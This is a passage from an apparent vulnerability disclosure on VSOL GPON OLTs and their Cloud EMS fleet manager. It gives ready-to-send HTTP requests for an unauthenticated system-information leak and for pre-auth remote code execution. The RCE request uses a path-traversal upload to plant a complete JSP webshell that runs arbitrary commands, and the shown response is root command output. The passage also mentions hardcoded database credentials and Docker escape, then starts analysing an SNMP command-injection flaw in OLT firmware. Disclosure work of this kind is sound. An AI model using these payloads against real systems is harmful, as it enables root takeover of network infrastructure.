<span class="w"> </span><span class="n">info</span><span class="p">.</span><span class="na">setCpuType</span><span class="p">(</span><span class="n">props</span><span class="p">.</span><span class="na">getProperty</span><span class="p">(</span><span class="s">"os.arch"</span><span class="p">)</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="s">"/"</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">rt</span><span class="p">.</span><span class="na">availableProcessors</span><span class="p">());</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">info</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="p">...</span>
<span class="p">}</span>
</code></pre></div>
<p>These classes are built to collect runtime and system level information about
the application's environment. They gather data such as CPU load, memory usage,
JVM memory allocation, <i>Java</i> runtime properties, and basic server metadata.</p>
<p><u>Request to exploit the Information Leakage:</u></p>
<div class="highlight"><pre><span></span><code><span class="nf">GET</span> <span class="nn">/emsWebServer/systemMonitoring/getSystemCpuAndMem</span> <span class="kr">HTTP</span><span class="o">/</span><span class="m">1.1</span>
<span class="na">Host</span><span class="o">:</span> <span class="l"><IP>:<PORT></span>
</code></pre></div>
<p><u>Response:</u></p>
<div class="highlight"><pre><span></span><code><span class="kr">HTTP</span><span class="o">/</span><span class="m">1.1</span> <span class="m">200</span> <span class="ne">OK</span>
<span class="na">Server</span><span class="o">:</span> <span class="l">Apache-Coyote/1.1</span>
<span class="na">Cache-Control</span><span class="o">:</span> <span class="l">private</span>
<span class="na">Expires</span><span class="o">:</span> <span class="l">Thu, 01 Jan 1970 00:00:00 GMT</span>
<span class="na">Content-Type</span><span class="o">:</span> <span class="l">application/json;charset=UTF-8</span>
<span class="na">Date</span><span class="o">:</span> <span class="l">Wed, 21 May 2025 21:23:36 GMT</span>
<span class="na">Content-Length</span><span class="o">:</span> <span class="l">668</span>
<span class="p">{</span><span class="nt">"id"</span><span class="p">:</span><span class="kc">null</span><span class="p">,</span><span class="nt">"cpuParameter"</span><span class="p">:</span><span class="s2">"13.0"</span><span class="p">,</span><span class="nt">"acaliableCpu"</span><span class="p">:</span><span class="s2">"87.0"</span><span class="p">,</span><span class="nt">"memoryParameter"</span><span class="p">:</span><span class="s2">"74.38"</span><span class="p">,</span><span class="nt">"createTime"</span><span class="p">:</span><span class="s2">"2025-05-21 23:23:36"</span><span class="p">,</span><span class="nt">"acaliableMemory"</span><span class="p">:</span><span class="s2">"7.73GB"</span><span class="p">,</span><span class="nt">"usedMemory"</span><span class="p">:</span><span class="s2">"22.43GB"</span><span class="p">,</span><span class="nt">"usedMemoryValue"</span><span class="p">:</span><span class="s2">"22.43"</span><span class="p">,</span><span class="nt">"acaliableMemoryValue"</span><span class="p">:</span><span class="s2">"7.73"</span><span class="p">,</span><span class="nt">"vmFree"</span><span class="p">:</span><span class="s2">"781"</span><span class="p">,</span><span class="nt">"vmUse"</span><span class="p">:</span><span class="s2">"353"</span><span class="p">,</span><span class="nt">"vmUsage"</span><span class="p">:</span><span class="s2">"31%"</span><span class="p">,</span><span class="nt">"javaVersion"</span><span class="p">:</span><span class="s2">"1.8.0_202"</span><span class="p">,</span><span class="nt">"javaVendor"</span><span class="p">:</span><span class="s2">"Oracle Corporation"</span><span class="p">,</span><span class="nt">"javaHome"</span><span class="p">:</span><span class="s2">"/usr/local/jdk1.8.0_202/jre"</span><span class="p">,</span><span class="nt">"javaVendorUrl"</span><span class="p">:</span><span class="s2">"http://java.oracle.com/"</span><span class="p">,</span><span class="nt">"vmSpecificationName"</span><span class="p">:</span><span class="s2">"Java Virtual Machine Specification"</span><span class="p">,</span><span class="nt">"javaSpecificationname"</span><span class="p">:</span><span class="s2">"Java Platform API Specification"</span><span class="p">,</span><span class="nt">"userName"</span><span class="p">:</span><span class="kc">null</span><span class="p">,</span><span class="nt">"computerUserName"</span><span class="p">:</span><span class="s2">"root"</span><span class="p">,</span><span class="nt">"ip"</span><span class="p">:</span><span class="kc">null</span><span class="p">,</span><span class="nt">"osname"</span><span class="p">:</span><span class="s2">"Linux"</span><span class="p">,</span><span class="nt">"cpuType"</span><span class="p">:</span><span class="s2">"amd64/16"</span><span class="p">,</span><span class="nt">"serverBuilt"</span><span class="p">:</span><span class="s2">"GMT+02:00"</span><span class="p">,</span><span class="nt">"serverVersion"</span><span class="p">:</span><span class="s2">"7.0.92"</span><span class="p">}</span>
</code></pre></div>
<p>The JSON output can be beautified for better readability, producing results
like the following:</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span>
<span class="w"> </span><span class="nt">"id"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"cpuParameter"</span><span class="p">:</span><span class="w"> </span><span class="s2">"13.0"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"acaliableCpu"</span><span class="p">:</span><span class="w"> </span><span class="s2">"87.0"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"memoryParameter"</span><span class="p">:</span><span class="w"> </span><span class="s2">"74.38"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"createTime"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2025-05-21 23:23:36"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"acaliableMemory"</span><span class="p">:</span><span class="w"> </span><span class="s2">"7.73GB"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"usedMemory"</span><span class="p">:</span><span class="w"> </span><span class="s2">"22.43GB"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"usedMemoryValue"</span><span class="p">:</span><span class="w"> </span><span class="s2">"22.43"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"acaliableMemoryValue"</span><span class="p">:</span><span class="w"> </span><span class="s2">"7.73"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"vmFree"</span><span class="p">:</span><span class="w"> </span><span class="s2">"781"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"vmUse"</span><span class="p">:</span><span class="w"> </span><span class="s2">"353"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"vmUsage"</span><span class="p">:</span><span class="w"> </span><span class="s2">"31%"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"javaVersion"</span><span class="p">:</span><span class="w"> </span><span class="s2">"1.8.0_202"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"javaVendor"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Oracle Corporation"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"javaHome"</span><span class="p">:</span><span class="w"> </span><span class="s2">"/usr/local/jdk1.8.0_202/jre"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"javaVendorUrl"</span><span class="p">:</span><span class="w"> </span><span class="s2">"http://java.oracle.com/"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"vmSpecificationName"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Java Virtual Machine Specification"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"javaSpecificationname"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Java Platform API Specification"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"userName"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"computerUserName"</span><span class="p">:</span><span class="w"> </span><span class="s2">"root"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"ip"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"osname"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Linux"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"cpuType"</span><span class="p">:</span><span class="w"> </span><span class="s2">"amd64/16"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"serverBuilt"</span><span class="p">:</span><span class="w"> </span><span class="s2">"GMT+02:00"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"serverVersion"</span><span class="p">:</span><span class="w"> </span><span class="s2">"7.0.92"</span>
<span class="p">}</span>
</code></pre></div>
<p>By pivoting through a compromised GPON OLT, it is possible to leveraged this
route to verify that the cloud fleet manager is both reachable and exploitable.
This would allow an attacker to confirm network access and validate the
potential to interact with <i>Cloud EMS</i> before shooting the second
vulnerability (pre-auth RCE).</p>
<p><a href="resources/2026-05-19_vsol/c18.png">
<img class="align-center" height="100%" src="resources/2026-05-19_vsol/c18.png" width="100%"/></a></p>
<p class="center-text">Figure 22 - Exploiting the vulnerability and leaking system's information.</p>
<p></p>
<h3 id="cloud-ems-remote-code-execution"><i>Cloud EMS</i> Remote Code Execution</h3>
<p>The class <code>FileUploadServlet</code> accepts file uploads via the <span class="color-blue">/uploadBUFile</span>
endpoint without performing any validation or access control. When a user
uploads a file, the servlet writes it directly to a path inside the
application's directory (<span class="color-red">/WEB-INF/upload</span>) without
filtering the file name and extension or verifying its contents. Because there
is no restriction on file extensions, it is possible to upload a malicious
<span class="color-red">.JSP</span> file.</p>
<p>File: <span class="color-red">WEB-INF/classes/com/vsol/backupDatabase/FileUploadServlet.class</span><br/>
Class: <code>FileUploadServlet</code><br/>
Function: <code>doPost()</code><br/>
HTTP route: <span class="color-blue">/emsWebServer/uploadBUFile</span></p>
<div class="highlight"><pre><span></span><code><span class="p">...</span>
<span class="nd">@WebServlet</span><span class="p">({</span><span class="s">"/uploadBUFile"</span><span class="p">})</span>
<span class="kd">public</span><span class="w"> </span><span class="kd">class</span> <span class="nc">FileUploadServlet</span><span class="w"> </span><span class="kd">extends</span><span class="w"> </span><span class="n">HttpServlet</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="kd">private</span><span class="w"> </span><span class="kd">static</span><span class="w"> </span><span class="kd">final</span><span class="w"> </span><span class="kt">long</span><span class="w"> </span><span class="n">serialVersionUID</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">1L</span><span class="p">;</span>
<span class="w"> </span><span class="kd">public</span><span class="w"> </span><span class="nf">FileUploadServlet</span><span class="p">()</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="kd">public</span><span class="w"> </span><span class="kt">void</span><span class="w"> </span><span class="nf">doPost</span><span class="p">(</span><span class="n">HttpServletRequest</span><span class="w"> </span><span class="n">request</span><span class="p">,</span><span class="w"> </span><span class="n">HttpServletResponse</span><span class="w"> </span><span class="n">response</span><span class="p">)</span><span class="w"> </span><span class="kd">throws</span><span class="w"> </span><span class="n">ServletException</span><span class="p">,</span><span class="w"> </span><span class="n">IOException</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">ServletFileUpload</span><span class="p">.</span><span class="na">isMultipartContent</span><span class="p">(</span><span class="n">request</span><span class="p">))</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">throw</span><span class="w"> </span><span class="k">new</span><span class="w"> </span><span class="n">RuntimeException</span><span class="p">(</span><span class="s">"当前请求不支持文件上传"</span><span class="p">);</span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">try</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">DiskFileItemFactory</span><span class="w"> </span><span class="n">factory</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">new</span><span class="w"> </span><span class="n">DiskFileItemFactory</span><span class="p">();</span>
<span class="w"> </span><span class="n">ServletFileUpload</span><span class="w"> </span><span class="n">servletFileUpload</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">new</span><span class="w"> </span><span class="n">ServletFileUpload</span><span class="p">(</span><span class="n">factory</span><span class="p">);</span>
<span class="w"> </span><span class="n">List</span><span class="o"><</span><span class="n">FileItem</span><span class="o">></span><span class="w"> </span><span class="n">items</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">servletFileUpload</span><span class="p">.</span><span class="na">parseRequest</span><span class="p">(</span><span class="n">request</span><span class="p">);</span>
<span class="w"> </span><span class="n">Iterator</span><span class="w"> </span><span class="n">var7</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">items</span><span class="p">.</span><span class="na">iterator</span><span class="p">();</span>
<span class="w"> </span><span class="k">while</span><span class="p">(</span><span class="kc">true</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">while</span><span class="p">(</span><span class="n">var7</span><span class="p">.</span><span class="na">hasNext</span><span class="p">())</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">FileItem</span><span class="w"> </span><span class="n">item</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">FileItem</span><span class="p">)</span><span class="n">var7</span><span class="p">.</span><span class="na">next</span><span class="p">();</span>
<span class="w"> </span><span class="n">String</span><span class="w"> </span><span class="n">fileName</span><span class="p">;</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">item</span><span class="p">.</span><span class="na">isFormField</span><span class="p">())</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">fileName</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">item</span><span class="p">.</span><span class="na">getFieldName</span><span class="p">();</span>
<span class="w"> </span><span class="n">String</span><span class="w"> </span><span class="n">fieldValue</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">item</span><span class="p">.</span><span class="na">getString</span><span class="p">();</span>
<span class="w"> </span><span class="n">System</span><span class="p">.</span><span class="na">out</span><span class="p">.</span><span class="na">println</span><span class="p">(</span><span class="n">fileName</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="s">" = "</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">fieldValue</span><span class="p">);</span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">fileName</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">item</span><span class="p">.</span><span class="na">getName</span><span class="p">();</span>
<span class="w"> </span><span class="n">dataBackupImpl</span><span class="p">.</span><span class="na">uploadFileName</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">fileName</span><span class="p">;</span>
<span class="w"> </span><span class="n">InputStream</span><span class="w"> </span><span class="n">is</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">item</span><span class="p">.</span><span class="na">getInputStream</span><span class="p">();</span>
<span class="w"> </span><span class="n">String</span><span class="w"> </span><span class="n">path0</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">""</span><span class="p">;</span>
<span class="w"> </span><span class="n">StringBuffer</span><span class="w"> </span><span class="n">path</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">new</span><span class="w"> </span><span class="n">StringBuffer</span><span class="p">();</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="s">"linux"</span><span class="p">.</span><span class="na">equals</span><span class="p">(</span><span class="n">SysUtils</span><span class="p">.</span><span class="na">getPlatForm</span><span class="p">()))</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">path0</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">this</span><span class="p">.</span><span class="na">getServletContext</span><span class="p">().</span><span class="na">getRealPath</span><span class="p">(</span><span class="s">"/WEB-INF/upload"</span><span class="p">);</span>
<span class="w"> </span><span class="n">path</span><span class="p">.</span><span class="na">append</span><span class="p">(</span><span class="n">path0</span><span class="p">);</span>
<span class="w"> </span><span class="n">dataBackupImpl</span><span class="p">.</span><span class="na">uploadFilePath</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">path</span><span class="p">.</span><span class="na">toString</span><span class="p">()</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="s">"/"</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">fileName</span><span class="p">;</span>
<span class="w"> </span><span class="n">System</span><span class="p">.</span><span class="na">out</span><span class="p">.</span><span class="na">println</span><span class="p">(</span><span class="s">"dataBackupImpl.uploadFilePath = "</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">dataBackupImpl</span><span class="p">.</span><span class="na">uploadFilePath</span><span class="p">);</span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="s">"windows"</span><span class="p">.</span><span class="na">equals</span><span class="p">(</span><span class="n">SysUtils</span><span class="p">.</span><span class="na">getPlatForm</span><span class="p">()))</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">path0</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">this</span><span class="p">.</span><span class="na">getServletContext</span><span class="p">().</span><span class="na">getRealPath</span><span class="p">(</span><span class="s">"\\WEB-INF\\upload"</span><span class="p">);</span>
<span class="w"> </span><span class="n">path</span><span class="p">.</span><span class="na">append</span><span class="p">(</span><span class="n">path0</span><span class="p">);</span>
<span class="w"> </span><span class="n">dataBackupImpl</span><span class="p">.</span><span class="na">uploadFilePath</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">path</span><span class="p">.</span><span class="na">toString</span><span class="p">()</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="s">"\\"</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">fileName</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="n">File</span><span class="w"> </span><span class="n">mkdirsFile</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">new</span><span class="w"> </span><span class="n">File</span><span class="p">(</span><span class="n">path</span><span class="p">.</span><span class="na">toString</span><span class="p">());</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">mkdirsFile</span><span class="p">.</span><span class="na">exists</span><span class="p">())</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">mkdirsFile</span><span class="p">.</span><span class="na">mkdirs</span><span class="p">();</span>
<span class="w"> </span><span class="n">LogObtain</span><span class="p">.</span><span class="na">configLogger</span><span class="p">.</span><span class="na">error</span><span class="p">(</span><span class="s">"FileUploadServlet 目录不存在 :"</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">path</span><span class="p">);</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="n">File</span><span class="w"> </span><span class="n">file</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">new</span><span class="w"> </span><span class="n">File</span><span class="p">(</span><span class="n">path</span><span class="p">.</span><span class="na">toString</span><span class="p">(),</span><span class="w"> </span><span class="n">fileName</span><span class="p">);</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">file</span><span class="p">.</span><span class="na">exists</span><span class="p">())</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">file</span><span class="p">.</span><span class="na">createNewFile</span><span class="p">();</span>
<span class="w"> </span><span class="n">LogObtain</span><span class="p">.</span><span class="na">configLogger</span><span class="p">.</span><span class="na">error</span><span class="p">(</span><span class="s">"FileUploadServlet 文件不存在 :"</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">fileName</span><span class="p">);</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="n">OutputStream</span><span class="w"> </span><span class="n">os</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">new</span><span class="w"> </span><span class="n">FileOutputStream</span><span class="p">(</span><span class="n">file</span><span class="p">);</span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">len</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="kc">true</span><span class="p">;</span>
<span class="w"> </span><span class="kt">byte</span><span class="o">[]</span><span class="w"> </span><span class="n">buf</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">new</span><span class="w"> </span><span class="kt">byte</span><span class="o">[</span><span class="mi">1024</span><span class="o">]</span><span class="p">;</span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">len</span><span class="p">;</span>
<span class="w"> </span><span class="k">while</span><span class="p">((</span><span class="n">len</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">is</span><span class="p">.</span><span class="na">read</span><span class="p">(</span><span class="n">buf</span><span class="p">))</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="o">-</span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">os</span><span class="p">.</span><span class="na">write</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="n">len</span><span class="p">);</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="n">os</span><span class="p">.</span><span class="na">close</span><span class="p">();</span>
<span class="w"> </span><span class="n">is</span><span class="p">.</span><span class="na">close</span><span class="p">();</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">return</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">catch</span><span class="w"> </span><span class="p">(</span><span class="n">FileUploadException</span><span class="w"> </span><span class="n">var17</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">LogObtain</span><span class="p">.</span><span class="na">globalLogger</span><span class="p">.</span><span class="na">error</span><span class="p">(</span><span class="s">"uploadBUFile error= "</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">var17</span><span class="p">);</span>
<span class="w"> </span><span class="n">var17</span><span class="p">.</span><span class="na">printStackTrace</span><span class="p">();</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="p">}</span>
<span class="p">}</span>
</code></pre></div>
<p>Additionally, because the file name is taken directly from the user input
(<code>item.getName()</code>) without sanitization, it is possible to perform a Path
Traversal attack. By submitting a filename like <span class="color-red">../../../../webapps/emsWebServer/img/icons.jsp</span>,
an attacker could write a malicious JSP into a directory that is publicly
accessible and interpreted by the <i>Tomcat</i> server, leading to immediate RCE
upon visiting the uploaded file's URL.</p>
<p><u>Request to exploit the Remote Code Execution via Arbitrary File Write:</u></p>
<div class="highlight"><pre><span></span><code><span class="nf">POST</span> <span class="nn">/emsWebServer/uploadBUFile</span> <span class="kr">HTTP</span><span class="o">/</span><span class="m">1.1</span>
<span class="na">Host</span><span class="o">:</span> <span class="l"><IP>:<PORT></span>
<span class="na">Content-Type</span><span class="o">:</span> <span class="l">multipart/form-data; boundary=---------------------------77314677240741426163653162638</span>
<span class="na">Content-Length</span><span class="o">:</span> <span class="l">1433</span>
-----------------------------77314677240741426163653162638
Content-Disposition: form-data; name="upload"; filename="../../../../webapps/emsWebServer/img/icons.jsp"
Content-Type: text/plain
<%@ page import="java.io.*" %>
<%
// Retrieve the "cmd" parameter from the URL (e.g., ?cmd=id).
String userCmd = request.getParameter("cmd");
// Check if the command is not null and not empty.
if (userCmd != null && !userCmd.trim().equals("")) {
try {
// Execute the system command.
Process p = Runtime.getRuntime().exec(userCmd);
// Read the command's output (standard output).
BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));
String line;
// Print each line of output to the browser (HTML line break added).
while ((line = reader.readLine()) != null) {
out.println(line);
}
// Close the reader.
reader.close();
} catch (Exception e) {
// If an error occurs during execution, display the error message.
out.println("Error executing command: " + e.getMessage());
}
} else {
// If no command is provided, inform the user.
out.println("No command specified. Use ?cmd=");
}
%>
-----------------------------77314677240741426163653162638--
</code></pre></div>
<p><u>Response:</u></p>
<div class="highlight"><pre><span></span><code><span class="kr">HTTP</span><span class="o">/</span><span class="m">1.1</span> <span class="m">200</span> <span class="ne">OK</span>
<span class="na">Server</span><span class="o">:</span> <span class="l">Apache-Coyote/1.1</span>
<span class="na">Content-Length</span><span class="o">:</span> <span class="l">0</span>
<span class="na">Date</span><span class="o">:</span> <span class="l">Tue, 20 May 2025 22:37:43 GMT</span>
</code></pre></div>
<p><a href="resources/2026-05-19_vsol/c19.png">
<img class="align-center" height="100%" src="resources/2026-05-19_vsol/c19.png" width="100%"/></a></p>
<p class="center-text">Figure 23 - Writing a webshell onto the server.</p>
<p></p>
<p><u>Request to trigger the webshell:</u></p>
<div class="highlight"><pre><span></span><code><span class="nf">POST</span> <span class="nn">/emsWebServer/img/icons.jsp</span> <span class="kr">HTTP</span><span class="o">/</span><span class="m">1.1</span>
<span class="na">Host</span><span class="o">:</span> <span class="l"><IP>:<PORT></span>
<span class="na">Content-Type</span><span class="o">:</span> <span class="l">application/x-www-form-urlencoded</span>
<span class="na">Content-Length</span><span class="o">:</span> <span class="l">6</span>
<span class="nt">cmd</span><span class="o">=</span><span class="s">id</span>
</code></pre></div>
<p><u>Response (HTTP):</u></p>
<div class="highlight"><pre><span></span><code><span class="kr">HTTP</span><span class="o">/</span><span class="m">1.1</span> <span class="m">200</span> <span class="ne">OK</span>
<span class="na">Server</span><span class="o">:</span> <span class="l">Apache-Coyote/1.1</span>
<span class="na">Set-Cookie</span><span class="o">:</span> <span class="l">shiro.sesssion=911d4eba-9c36-4d61-8191-b73a788039e3; Path=/; HttpOnly</span>
<span class="na">Content-Type</span><span class="o">:</span> <span class="l">text/html;charset=ISO-8859-1</span>
<span class="na">Content-Length</span><span class="o">:</span> <span class="l">41</span>
<span class="na">Date</span><span class="o">:</span> <span class="l">Wed, 21 May 2025 23:15:41 GMT</span>
uid=0(root) gid=0(root) groups=0(root)
</code></pre></div>
<p><a href="resources/2026-05-19_vsol/c20.png">
<img class="align-center" height="100%" src="resources/2026-05-19_vsol/c20.png" width="100%"/></a></p>
<p class="center-text">Figure 24 - Interaction with the webshell (commands executed as <code>root</code>).</p>
<p></p>
<p>In addition to those described above, several other vulnerabilities were
identified. These include multiple authenticated Command Injection bugs (e.g.,
via the route <span class="color-blue">/export</span> and parameter <code>beckName</code>),
as well as hardcoded credentials (<code>root</code>/<code>vsol***9</code>) stored in plain text
(within the decompiled Java code), which allow access to the <i>MySQL</i>
database. That said, there is no need to investigate the cloud manager further,
as we already discovered a pre-auth RCE as <code>root</code>, along with a method to escape
the <i>Docker</i> container via the <i>Docker</i> socket (if necessary).</p>
<p>What is particularly interesting is how to attack OLTs once the cloud manager
have been compromised. In the following sections, we will examine various
vulnerabilities affecting different OLT models.</p>
<h2 id="olts-command-injection-in-the-traceroute-feature-via-snmp-pre-auth_1">OLTs Command Injection in the traceroute feature via SNMP (pre-auth)</h2>
<p>By reversing the firmware of the models V1600GS-O32 and V1600GT we identified an
unauthenticated Command Injection vulnerability in the binaries responsible for
handling SNMP requests. More specifically, the vulnerability lies within the
handler for the traceroute feature.</p>
<h3 id="model-v1600gs-o32-binary-gpond">Model V1600GS-O32 (binary: <span class="color-red">gpond</span>)</h3>
<p>The binary implementing the functionalities related to SNMP requests is the
binary <span class="color-red">gpond</span>. To identify the bug, I looked at
the following call stack.</p>
<h4 id="call-stack">Call stack</h4>
<ul>
<li><code>TracertDiagnoseProcessWriteReq()</code><ul>
<li><code>SetTracertDestIPorHostName()</code>, <code>SetTracertIPType()</code>, <code>SetTracertAction()</code><ul>
<li><code>snmp_tracert_diagnose()</code><ul>
<li><code>snmp_diagnose_tracert_pthread()</code><ul>
<li><code>snmp_diagnose_tracert_exec()</code><ul>
<li><code>system("traceroute -m 15 <SNMP_TRACERT_IPADDR> >/tmp/snmp_tracetest")</code></li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
<p>I was able to identify that the function <code>TracertDiagnoseProcessWriteReq()</code> was
responsible for parsing the SNMP request.</p>
<h4 id="details-of-impacted-functions">Details of impacted functions</h4>
<p>File: <span class="color-red">gpond</span><br/>
Function: <code>TracertDiagnoseProcessWriteReq()</code></p>
<div class="highlight"><pre><span></span><code><span class="n">undefined4</span><span class="w"> </span><span class="o">*</span>
<span class="nf">TracertDiagnoseProcessWriteReq</span>
<span class="w"> </span><span class="p">(</span><span class="kt">long</span><span class="w"> </span><span class="n">param_1</span><span class="p">,</span><span class="n">undefined8</span><span class="w"> </span><span class="n">param_2</span><span class="p">,</span><span class="n">uint</span><span class="w"> </span><span class="o">*</span><span class="n">param_3</span><span class="p">,</span><span class="kt">int</span><span class="w"> </span><span class="o">*</span><span class="n">param_4</span><span class="p">,</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">param_5</span><span class="p">)</span>
<span class="p">{</span>
<span class="w"> </span><span class="n">undefined4</span><span class="w"> </span><span class="o">*</span><span class="n">puVar1</span><span class="p">;</span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">iVar2</span><span class="p">;</span>
<span class="w"> </span><span class="p">...</span>
<span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">iVar2</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="o">*</span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="o">*</span><span class="p">)(</span><span class="n">param_1</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mh">0x34</span><span class="p">);</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">iVar2</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">2</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
